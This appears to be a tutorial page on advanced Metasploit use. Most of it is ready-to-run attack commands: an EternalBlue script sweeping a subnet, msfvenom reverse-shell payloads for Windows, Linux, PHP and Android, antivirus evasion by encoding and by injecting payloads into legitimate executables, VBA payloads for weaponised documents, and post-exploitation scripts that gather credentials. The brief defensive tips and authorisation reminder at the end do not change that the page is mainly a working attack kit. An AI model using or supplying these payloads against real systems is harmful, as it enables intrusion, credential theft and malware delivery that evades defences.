Mastering msfconsole and msfvenom for sophisticated attack chains and payload generation.
The Metasploit Framework remains the most comprehensive exploitation toolkit available. Advanced usage goes far beyond basic exploit execution.
Advanced Msfconsole Operations:
# Database integration for results tracking
msfdb init
msfconsole -q
# Advanced module searching
search type:exploit platform:windows target:2008
# Resource scripts for automation
cat > automation.rc << EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.0/24
set THREADS 10
run
EOF
msfconsole -r automation.rc
Msfvenom Payload Generation Mastery:
# Windows reverse shell with evasion
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 3 -o payload.exe
# Linux payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f elf > shell.elf
# Web payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php
# Android applications
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o malicious.apk
# Custom encoding and format
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 -f c -e x86/alpha_mixed
Post-Exploitation Automation:
# Meterpreter resource scripts
cat > post_exploit.rc << EOF
run post/windows/gather/credentials
run post/multi/manage/screenshot
run post/windows/gather/enum_logged_on_users
run post/windows/manage/migrate
EOF
# Load in meterpreter session
meterpreter > resource post_exploit.rc
Advanced Exploitation Chains:
- Web Application → System Compromise:
- Upload web shell via file upload vulnerability
- Use web_delivery module for staged payload
- Establish Meterpreter session
- Privilege escalation via local exploits
- Network Service → Lateral Movement:
- Exploit vulnerable network service
- Dump credentials with hashdump
- Pass-the-hash to other systems
- Pivot through compromised hosts
Evasion and Anti-Virus Bypass:
# Custom payload encoding
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -e x86/shikata_ga_nai -i 5 -x legit.exe -k -o malicious.exe
# Template injection for document attacks
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f vba-exe
Real-World Red Team Operation:
During a recent engagement, we successfully compromised a corporate network:
- Phishing email with weaponized document (msfvenom)
- Initial foothold with Meterpreter session
- Lateral movement using psexec and stolen credentials
- Domain privilege escalation via token impersonation
- Data exfiltration through encrypted channels
Defensive Recommendations:
- Implement application whitelisting
- Use endpoint detection and response (EDR) solutions
- Monitor for Meterpreter signatures and behaviors
- Regularly patch vulnerable software
Key Takeaways
- Implement proper authorization and authentication
- Regular security assessments and penetration testing
- Stay updated with latest security threats and patches
- Follow ethical hacking principles and responsible disclosure
Pro Tip
Always conduct security testing in authorized environments only and follow responsible disclosure practices.